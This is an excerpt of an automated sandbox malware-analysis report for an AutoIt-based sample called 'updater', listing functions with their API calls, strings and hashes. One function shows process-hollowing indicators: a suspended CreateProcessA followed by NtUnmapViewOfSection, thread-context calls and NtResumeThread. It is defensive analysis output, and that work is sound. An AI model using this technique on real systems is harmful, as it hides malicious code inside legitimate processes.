Instruction Fuzzy Hash: 76313071F0420A7EEB11DAF8CC88BEFB7BD9B18300F844195A255E7541DBB8DA458B50

Function 00325D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00325D40

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

GetCurrentProcess.KERNEL32(?,003A0A18,00000000,00000000,?), ref: 00325E07
IsWow64Process.KERNEL32(00000000), ref: 00325E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00325E54
FreeLibrary.KERNEL32(00000000), ref: 00325E5F
GetSystemInfo.KERNEL32(00000000), ref: 00325E90
GetSystemInfo.KERNEL32(00000000), ref: 00325E9C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a8e6600f0d230e57305e20e9f122d8cbdbfc1b930a8aad14af9cc0ae3b62c0b0
Instruction ID: 8c7959953afc5059fe60496b4753489911f8378338afc706c8ac4095206d2327
Opcode Fuzzy Hash: a8e6600f0d230e57305e20e9f122d8cbdbfc1b930a8aad14af9cc0ae3b62c0b0
Instruction Fuzzy Hash: 7191B331549BD0DECB33CB68A4515EBFFE5AF3A300B894A5ED0C797A01D230A648C769

Function 00311663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00311DD6
GetSysColor.USER32(0000000F), ref: 00311E2A
SetBkColor.GDI32(?,00000000), ref: 00311E3D

Part of subcall function 0031166C: DefDlgProcW.USER32(?,00000020,?), ref: 003116B4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 17d19592740107226085a8d75b72a442dd3989f8826e842601be724d8cdecf66
Instruction ID: 7215e6bd8e90784e9423c6d7ce97aca5642437150d3de20926b5e847c145a0a7
Opcode Fuzzy Hash: 17d19592740107226085a8d75b72a442dd3989f8826e842601be724d8cdecf66
Instruction Fuzzy Hash: 3CA17A7011A404BADA3F6B69AC89EFF359DDF4A301F12010AF602CE5D1EB20EC91D275

Function 016D68B5 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 016D68D0
FindClose.KERNEL32(00000000,00000000,?), ref: 016D68DB
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 016D68F4
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 016D6905

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction ID: 19d75db4560e30522ed6b5903c58955929eb63767429bc174ef6d9d1908ccaca
Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction Fuzzy Hash: 74F01272D0020DA6DF11EAE9CD84DCEB3BD6B09324F100696A529D3291EB34DB148B95

Function 0031B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00323740: CharUpperBuffW.USER32(?,003D71DC,00000000,?,00000000,003D71DC,?,003153A5,?,?,?,?), ref: 0032375D

_memmove.LIBCMT ref: 0031B68A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 7d49ea30a9fcd2beb954f71f61a9e0512655d972390533f98dc19b705133ebf7
Instruction ID: 9d1c3062f0e73acb96a0a7e661c9e0a3dba207261c1f8f88dd1963497e5f2d8d
Opcode Fuzzy Hash: 7d49ea30a9fcd2beb954f71f61a9e0512655d972390533f98dc19b705133ebf7
Instruction Fuzzy Hash: B9A29B746083418FC72ACF24C480BAAF7E5BF89344F15895DE89A8B761D770ED85CB92

Function 00319C80 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00352836

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 1c221819bc573ad98e0d55210f07b1863d7aadc8b072b0bf3a09d219a1867050
Instruction ID: a0b0e2095c74ab800e8cbd0fc0588ff79d53760cd09ca0dfc5be3b211ace7339
Opcode Fuzzy Hash: 1c221819bc573ad98e0d55210f07b1863d7aadc8b072b0bf3a09d219a1867050
Instruction Fuzzy Hash: 99A29A74A01605CFCB2ACF98C490AEEB7B5BF4D301F25845AD805AB351D735ED86CB92

Function 016E56A7 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016E56AB

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

Function 0031BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0031BF57

Part of subcall function 003152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6

Sleep.KERNEL32(0000000A,?,?), ref: 003536B5

Strings

@TRAY_ID, xrefs: 00353FCD
@GUI_CTRLHANDLE, xrefs: 00353816
@COM_EVENTOBJ, xrefs: 00353D2E
@GUI_WINHANDLE, xrefs: 003537C1
@GUI_CTRLID, xrefs: 0035376C
CALL, xrefs: 0031C277

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: cd1cc8f0bbf140824236abf090356e63bb15ff2c8a4fd0db8fef848853f0f571
Instruction ID: 986499118d051d58a7f70839169ac08078d02c9de5ec9a6ed423824dbccc77a3
Opcode Fuzzy Hash: cd1cc8f0bbf140824236abf090356e63bb15ff2c8a4fd0db8fef848853f0f571
Instruction Fuzzy Hash: 04C29370608341DFD72ADF24C885FAAB7E4FF88344F15491DE88A8B261D771E989CB52

Function 00312BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00312C8C
GetSystemMetrics.USER32(00000007), ref: 00312C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00312CBF
GetSystemMetrics.USER32(00000008), ref: 00312CC7
GetSystemMetrics.USER32(00000004), ref: 00312CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00312D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00312D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00312D60
GetClientRect.USER32(00000000,000000FF), ref: 00312D7E
GetStockObject.GDI32(00000011), ref: 00312D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00312DA5

Part of subcall function 00312714: GetCursorPos.USER32(?), ref: 00312727
Part of subcall function 00312714: ScreenToClient.USER32(003D77B0,?), ref: 00312744
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000001), ref: 00312769
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000002), ref: 00312777

SetTimer.USER32(00000000,00000000,00000028,003113C7), ref: 00312DCC

Strings

AutoIt v3 GUI, xrefs: 00312D44
h:, xrefs: 00312BEC, 0034C433

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$h:
API String ID: 1458621304-2556057621
Opcode ID: 2d22d4bf03cead69f5f006ad127ad306d2b9f6cbda16d280828b69b555e36529
Instruction ID: 7c556bec8f6a8fa6c1349e3b1b91cdead829f43c6ebfcdb123a828017d4181d8
Opcode Fuzzy Hash: 2d22d4bf03cead69f5f006ad127ad306d2b9f6cbda16d280828b69b555e36529
Instruction Fuzzy Hash: 88B15075A0520ADFDB1ADFA8DD59BEE77B8FB08310F114129FA15AB290DB70A850CF50

Function 016E9E39 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 464
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,016EA458), ref: 016E9F3E
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,016EA458,00000000,00000000,00000000,00000000,00000000,00000004), ref: 016E9F62
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,016EA458), ref: 016E9F95
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,016EA458,00000000,00000000,00000000,00000000,00000000,00000004), ref: 016E9FB5
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,016EA458,00000000,00000000,00000000,00000000,00000000,00000004), ref: 016E9FE7

Part of subcall function 016E5B0D: GetTickCount.KERNEL32 ref: 016E5B86

Part of subcall function 016E88D1: MessageBoxA.USER32(00000000,00000000,016E8931,00040040), ref: 016E8904

GetTickCount.KERNEL32 ref: 016EA420

Strings

NtTerminateProcess, xrefs: 016EA28B, 016EA322, 016EA416
execution failure, try to assign other file path, xrefs: 016EA2DA, 016EA370
NtUnmapViewOfSection, xrefs: 016EA097
NtSetContextThread, xrefs: 016EA1E6
D, xrefs: 016E9EEE
NtGetContextThread, xrefs: 016EA03B
NtFreeVirtualMemory, xrefs: 016EA3E0
NtResumeThread, xrefs: 016EA23D

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CreateProcess$CountTick$Message
String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
API String ID: 2713535555-1661097759
Opcode ID: bf71a33d41ebcb6004876e6d320586552f03800482a0e0cd8b593c56c17664fd
Instruction ID: 39017a9a678d327548387f518d4aa1473873eb69214aad62150d48c579a7b933
Opcode Fuzzy Hash: bf71a33d41ebcb6004876e6d320586552f03800482a0e0cd8b593c56c17664fd
Instruction Fuzzy Hash: C012EA70E01219AFEB10DBA8CD89BDEBBF9AF08704F104199E604E7381D774AA44CF65

Function 003133E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00313444
RegisterClassExW.USER32(00000030), ref: 0031346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
InitCommonControlsEx.COMCTL32(?), ref: 0031349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
LoadIconW.USER32(000000A9), ref: 003134C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

0, xrefs: 00313426
+, xrefs: 0031342D
TaskbarCreated, xrefs: 00313474
AutoIt v3 GUI, xrefs: 00313460

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 05abe7cad01942f3290925239ce0d5c3908238ba4f2621ce6d9e6d03d202f1b1
Instruction ID: 3248df531e7e00d12463ab08d3db4a4f31a4e384728e8602dade39527a36fe39
Opcode Fuzzy Hash: 05abe7cad01942f3290925239ce0d5c3908238ba4f2621ce6d9e6d03d202f1b1
Instruction Fuzzy Hash: 58314871845309AFDB42CFA4EC89BCDBBF8FB0A310F10411AE580E62A0E3B61581DF50

Function 00313411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00313444
RegisterClassExW.USER32(00000030), ref: 0031346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
InitCommonControlsEx.COMCTL32(?), ref: 0031349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
LoadIconW.USER32(000000A9), ref: 003134C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

0, xrefs: 00313426
+, xrefs: 0031342D
TaskbarCreated, xrefs: 00313474
AutoIt v3 GUI, xrefs: 00313460

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8faae9d23bee983dd3628c9af522d25f2e8f806cb4e17269aae0fa31e6817329
Instruction ID: 39bd86c8ba029516feeca1e9bd745e3ac5cd29074bdb733d1652198546459e7e
Opcode Fuzzy Hash: 8faae9d23bee983dd3628c9af522d25f2e8f806cb4e17269aae0fa31e6817329
Instruction Fuzzy Hash: 9421E3B1905318AFDB06DFA4EC89BDDBBF8FB09700F00411AF910A62A0E7B11544DF91

Function 016D1B29 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharNextA.USER32(00000000), ref: 016D1B7E
CharNextA.USER32(00000000,00000000), ref: 016D1B8A
CharNextA.USER32(00000000,00000000), ref: 016D1BB2
CharNextA.USER32(00000000), ref: 016D1BBE
CharNextA.USER32(?,00000000), ref: 016D1BFF
CharNextA.USER32(00000000,?,00000000), ref: 016D1C0B
CharNextA.USER32(00000000,?,00000000), ref: 016D1C43
CharNextA.USER32(?,00000000), ref: 016D1C4F

Strings

, xrefs: 016D1B51
", xrefs: 016D1BA3
", xrefs: 016D1C34

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
Instruction ID: 6d02fd7c523d3c7f4dab965e3a466de99f79e4a03dca3dbb169b8112d4e0d2b8
Opcode Fuzzy Hash: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
Instruction Fuzzy Hash: 2651D674A08282EFE321DFACC884A25BBE5EF1A350F244C5DE5C5CB311E3B5A841CB55

Function 00322FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003300CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00323094), ref: 003300ED

Part of subcall function 003308C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0032309F), ref: 003308E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003230E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003601BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003601FB
RegCloseKey.ADVAPI32(?), ref: 00360239
_wcscat.LIBCMT ref: 00360292

Strings

Include, xrefs: 003601B1, 003601F2
\, xrefs: 003602B5
Software\AutoIt v3\AutoIt, xrefs: 003230D8
\Include\, xrefs: 0032309F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 4ee895d6df98aa2be177945f20238785a56b76d2e35fd8fb8cb507f0c8ff38ff
Instruction ID: 14971a2afc73463b06d8bf2b8707277e57557cb06a9fdf554633dd008e0d04a4
Opcode Fuzzy Hash: 4ee895d6df98aa2be177945f20238785a56b76d2e35fd8fb8cb507f0c8ff38ff
Instruction Fuzzy Hash: 30715D7140A7119EC307EF65E8929ABBBECFF55340F40492EF445872A0EF30A944CB91

Function 0032514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00325156
LoadCursorW.USER32(00000000,00007F00), ref: 00325165
LoadIconW.USER32(00000063), ref: 0032517C
LoadIconW.USER32(000000A4), ref: 0032518E
LoadIconW.USER32(000000A2), ref: 003251A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003251C6
RegisterClassExW.USER32(?), ref: 0032521C

Part of subcall function 00313411: GetSysColorBrush.USER32(0000000F), ref: 00313444
Part of subcall function 00313411: RegisterClassExW.USER32(00000030), ref: 0031346E
Part of subcall function 00313411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
Part of subcall function 00313411: InitCommonControlsEx.COMCTL32(?), ref: 0031349C
Part of subcall function 00313411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
Part of subcall function 00313411: LoadIconW.USER32(000000A9), ref: 003134C2
Part of subcall function 00313411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

0, xrefs: 003251FA
#, xrefs: 00325201
AutoIt v3, xrefs: 0032520B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 1ff27740e0a697436b4eb6afd2363a01d59796c3e2c6d1ecea212fd92f2848c0
Instruction ID: 5c3b04f743d9db9e6d5f7dd7ea1bde865b5a8f8978b8525fe87a29d2643c867a
Opcode Fuzzy Hash: 1ff27740e0a697436b4eb6afd2363a01d59796c3e2c6d1ecea212fd92f2848c0
Instruction Fuzzy Hash: 2C216B70D06358AFEB169FA4FD09B9D7FB8FB08311F00455AF504A62A0E7B65650CF84

Function 00324D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00324E22
KillTimer.USER32(?,00000001), ref: 00324E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00324E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00324E7A
CreatePopupMenu.USER32 ref: 00324E8E
PostQuitMessage.USER32(00000000), ref: 00324EAF

Strings

TaskbarCreated, xrefs: 00324E75

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c8fd0c12e007d7fb1892adca6c482643a4ec928fda0fdcfd7b6e4da1d3401326
Instruction ID: dfbd0108dd48a16df35648785bb233a9f723b300537a50e6298370ee8349c272
Opcode Fuzzy Hash: c8fd0c12e007d7fb1892adca6c482643a4ec928fda0fdcfd7b6e4da1d3401326
Instruction Fuzzy Hash: F5414971248266ABFB1B5F24FC0AB7E779DF745300F020526F902966A2EB719C50A771

Function 0031AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003307BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003307EC
Part of subcall function 003307BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 003307F4
Part of subcall function 003307BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003307FF
Part of subcall function 003307BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0033080A
Part of subcall function 003307BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00330812
Part of subcall function 003307BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0033081A

Part of subcall function 0032FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0031AC6B), ref: 0032FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0031AD08
OleInitialize.OLE32(00000000), ref: 0031AD85
CloseHandle.KERNEL32(00000000), ref: 00352F56

Strings

\t=, xrefs: 0031AB32
s=, xrefs: 0031AB26
<w=, xrefs: 0031AC6B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

